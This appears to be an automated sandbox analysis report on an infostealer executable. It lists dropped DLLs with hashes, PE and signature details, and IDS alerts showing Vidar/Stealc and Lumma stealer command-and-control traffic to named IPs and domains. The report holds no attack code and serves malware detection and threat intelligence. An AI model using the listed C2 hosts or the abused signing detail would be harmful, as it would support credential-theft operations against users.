                                                                                                                                                      SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):685392
                                                                                                                                                      Entropy (8bit):6.872871740790978
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                      MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                      SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                      SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                      SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: nJohIBtNm5.exe, Detection: malicious, Browse
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):608080
                                                                                                                                                      Entropy (8bit):6.833616094889818
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                      MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                      SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                      SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                      SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):450024
                                                                                                                                                      Entropy (8bit):6.673992339875127
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                      MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                      SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                      SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                      SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                      Malicious:false
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2046288
                                                                                                                                                      Entropy (8bit):6.787733948558952
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                      MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                      SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                      SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                      SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):257872
                                                                                                                                                      Entropy (8bit):6.727482641240852
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                      MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                      SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                      SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                      SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):80880
                                                                                                                                                      Entropy (8bit):6.920480786566406
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                      MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                      SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                      SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                      SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                      Malicious:false
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      Process:C:\ProgramData\ECBKKKFHCF.exe
                                                                                                                                                      File Type:CSV text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):425
                                                                                                                                                      Entropy (8bit):5.353683843266035
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                      MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                      SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                      SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                      SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                      File Type:CSV text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):425
                                                                                                                                                      Entropy (8bit):5.353683843266035
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                      MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                      SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                      SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                      SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):391072
                                                                                                                                                      Entropy (8bit):7.98768128979655
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:A+wIKgwXXUXc+y+VrRlmZwTIwniaYiHQlqy1V0eUspq3lQVGpLqydC2a9EO:AQsXXUs+y+xR8aniXiHQxnFUcrVuLquE
                                                                                                                                                      MD5:BE9E376D9BAB656B145A7C8316636903
                                                                                                                                                      SHA1:D203D8C541918496D75C6C36C43DF8E98CD8AEF8
                                                                                                                                                      SHA-256:43DD8FCF131F4B471D17CBBCF8BD7C0E3C9354D9727E8FE4A8CD763029E4D98C
                                                                                                                                                      SHA-512:3BAFF4F6D869F97B4D6D6E1406074B4EE9E227F40AC3234504D4540DD9B4098A7CD9D12083D92DF4DD88389166779A67CB9D06257B635674AEA21641083E9BBC
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):34879
                                                                                                                                                      Entropy (8bit):5.399047147641164
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:768:Mdpqme0Ih+3tAA6WGWefcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2W:Md8me0Ih+3tAA6WGWeFhTBv++nIjBtPy
                                                                                                                                                      MD5:E9E0CEE9439F4EEC3B479F6CC862222D
                                                                                                                                                      SHA1:6DD03263237E4709D154B6D547B4CD3A89FE2F87
                                                                                                                                                      SHA-256:5639FB3AEFF4367D2045EC63F269BA52A91153A12D3C823680AA02A6DEF35BFF
                                                                                                                                                      SHA-512:EB16110F08EB78722DACF1DE52A6631F79DC2051FBE6FD613D4DD8CEA518BD0FE49A3FF21AFE6BD2B438280894A08754716594B792BC262A14F739754BCC1BD3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://49.12.197.9|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link href=
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:ISO-8859 text, with very long lines (65536), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1048575
                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:3B33BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBh:R
                                                                                                                                                      MD5:6A4ABB285504EBA4A59429B336395E94
                                                                                                                                                      SHA1:02C74ECBA97F506EAA6BE41EF2FDA9394615B59A
                                                                                                                                                      SHA-256:8597264848CC049553CB6974E29FA98AFFE64CD3439ECAB29ED4716657D2D246
                                                                                                                                                      SHA-512:2436C77B5DA69FAE6317569993C051EEEFCB5DC3F5C75992D88607A4E5DD1A0587560E5863FE441F0D3EB381CED8929D6BBE84E969EC8ABD91E1BDE6891042B1
                                                                                                                                                      Malicious:false
                                                                                                                                                      File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Entropy (8bit):7.989192562075166
                                                                                                                                                      TrID:
                                                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                      File name:file.exe
                                                                                                                                                      File size:423'840 bytes
                                                                                                                                                      MD5:7b5e8e3db2ce9c97f6a8214a4ccd3872
                                                                                                                                                      SHA1:e26cc5d9f9489593ae727a3358602d7b963f7f59
                                                                                                                                                      SHA256:59776469143431b5ddf203e169ed86915ff04fff5ff8e7231a53472c043eabf4
                                                                                                                                                      SHA512:2b4793d855a298b7ca36c7a9d8e5602634ddfc7c675f9bc1462a1c69d1fbd7f269354b73c361f5906da86b577f8c10589cda64acdd1fc1eae624e2ed24da5f98
                                                                                                                                                      SSDEEP:6144:RM61zc6W8/LuuBdM5+52YL3TIOwOh9Zc+5FiMwKDD19YPeOVzUZXVe1TnRwhj3AK:RTHW8TuurM5gL8avk253dbe1TnSq+5EO
                                                                                                                                                      TLSH:829423164F58AA6EDB4E15703092F612BEB175E75E81D0E3F329D060CF683922B6C629
                                                                                                                                                      Icon Hash:00928e8e8686b000
                                                                                                                                                      Entrypoint:0x463f4e
                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                      Digitally signed:true
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      Subsystem:windows cui
                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                      Time Stamp:0x66FE10AB [Thu Oct 3 03:34:03 2024 UTC]
                                                                                                                                                      TLS Callbacks:
                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                      OS Version Major:4
                                                                                                                                                      OS Version Minor:0
                                                                                                                                                      File Version Major:4
                                                                                                                                                      File Version Minor:0
                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                      Signature Valid:false
                                                                                                                                                      Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                      Error Number:-2146869232
                                                                                                                                                      Not Before, Not After
                                                                                                                                                      • 13/01/2023 01:00:00 17/01/2026 00:59:59
                                                                                                                                                      Subject Chain
                                                                                                                                                      • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                                                                                                                      Version:3
                                                                                                                                                      Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                                                                                                                                      Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                                                                                                                                      Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                                                                                                                                      Serial:0997C56CAA59055394D9A9CDB8BEEB56
                                                                                                                                                      Instruction
                                                                                                                                                      jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x63ef8 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0x242 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x65178 | 0x2628 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x66000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x63dc0 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x61f54 | 0x62000 | 6811be74d2db6f6275be1f1b78cd18f7 | False | 0.9935925542091837 | data | 7.996106599769484 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x64000 | 0x242 | 0x400 | de587f26ae0fb3240b210085d083946f | False | 0.302734375 | data | 3.526286411687027 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x66000 | 0xc | 0x200 | 0990a108bfe9d4f667dd8680cfd6f1b6 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x64058 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-03T09:16:09.033709+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49721 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:10.269242+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49722 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:11.603749+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49723 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:12.968759+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49724 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:13.666117+0200 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | 1 | 192.168.2.6 | 49724 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:13.666323+0200 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 49.12.197.9 | 443 | 192.168.2.6 | 49724 | TCP
2024-10-03T09:16:14.315886+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49725 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:15.020448+0200 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 49.12.197.9 | 443 | 192.168.2.6 | 49725 | TCP
2024-10-03T09:16:15.778102+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49726 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:16.769528+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49727 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:19.708106+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49728 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:20.784635+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49729 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:21.921444+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49730 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:23.148932+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49731 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:24.833934+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49732 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:26.539409+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49733 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:28.113677+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49735 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:29.539542+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49736 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:30.799417+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49737 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:33.915638+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49738 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:35.365919+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49739 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:36.749671+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49740 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:38.133675+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49742 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:40.196938+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49743 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:42.018642+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49744 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:43.416365+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.6 | 49745 | 147.45.44.104 | 80 | TCP
2024-10-03T09:16:44.433969+0200 | 2056396 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chorusarorp .site) | 1 | 192.168.2.6 | 53950 | 1.1.1.1 | 53 | UDP
2024-10-03T09:16:44.478276+0200 | 2056402 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (questionsmw .store) | 1 | 192.168.2.6 | 65507 | 1.1.1.1 | 53 | UDP
2024-10-03T09:16:44.699283+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49746 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:44.968580+0200 | 2056403 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (questionsmw .store in TLS SNI) | 1 | 192.168.2.6 | 49747 | 172.67.208.141 | 443 | TCP
2024-10-03T09:16:45.424799+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49747 | 172.67.208.141 | 443 | TCP
2024-10-03T09:16:45.424799+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49747 | 172.67.208.141 | 443 | TCP
2024-10-03T09:16:45.430241+0200 | 2056408 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soldiefieop .site) | 1 | 192.168.2.6 | 53042 | 1.1.1.1 | 53 | UDP
2024-10-03T09:16:45.922882+0200 | 2056409 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (soldiefieop .site in TLS SNI) | 1 | 192.168.2.6 | 49748 | 188.114.96.3 | 443 | TCP
2024-10-03T09:16:46.376230+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49748 | 188.114.96.3 | 443 | TCP
2024-10-03T09:16:46.376230+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49748 | 188.114.96.3 | 443 | TCP
2024-10-03T09:16:46.380069+0200 | 2056392 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abnomalrkmu .site) | 1 | 192.168.2.6 | 58118 | 1.1.1.1 | 53 | UDP
2024-10-03T09:16:46.483948+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49749 | 49.12.197.9 | 443 | TCP
2024-10-03T09:16:46.889929+0200 | 2056393 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (abnomalrkmu .site in TLS SNI) | 1 | 192.168.2.6 | 49750 | 172.67.152.190 | 443 | TCP
                                                                                                                                                      2024-10-03T09:16:47.369794+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649750172.67.152.190443TCP
                                                                                                                                                      2024-10-03T09:16:47.369794+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649750172.67.152.190443TCP
                                                                                                                                                      2024-10-03T09:16:47.376100+02002056410ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (treatynreit .site)1192.168.2.6652261.1.1.153UDP
                                                                                                                                                      2024-10-03T09:16:47.877600+02002056411ET MALWARE Observed Win32/Lumma Stealer Related Domain (treatynreit .site in TLS SNI)1192.168.2.649752104.21.84.18443TCP
                                                                                                                                                      2024-10-03T09:16:48.158642+02002054495ET MALWARE Vidar Stealer Form Exfil1192.168.2.64975145.132.206.25180TCP
                                                                                                                                                      2024-10-03T09:16:49.332498+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649752104.21.84.18443TCP
                                                                                                                                                      2024-10-03T09:16:49.332498+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649752104.21.84.18443TCP
                                                                                                                                                      2024-10-03T09:16:49.334787+02002056406ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (snarlypagowo .site)1192.168.2.6590231.1.1.153UDP
                                                                                                                                                      2024-10-03T09:16:49.860301+02002056407ET MALWARE Observed Win32/Lumma Stealer Related Domain (snarlypagowo .site in TLS SNI)1192.168.2.649753104.21.18.193443TCP
                                                                                                                                                      2024-10-03T09:16:50.284294+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649753104.21.18.193443TCP
                                                                                                                                                      2024-10-03T09:16:50.284294+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649753104.21.18.193443TCP
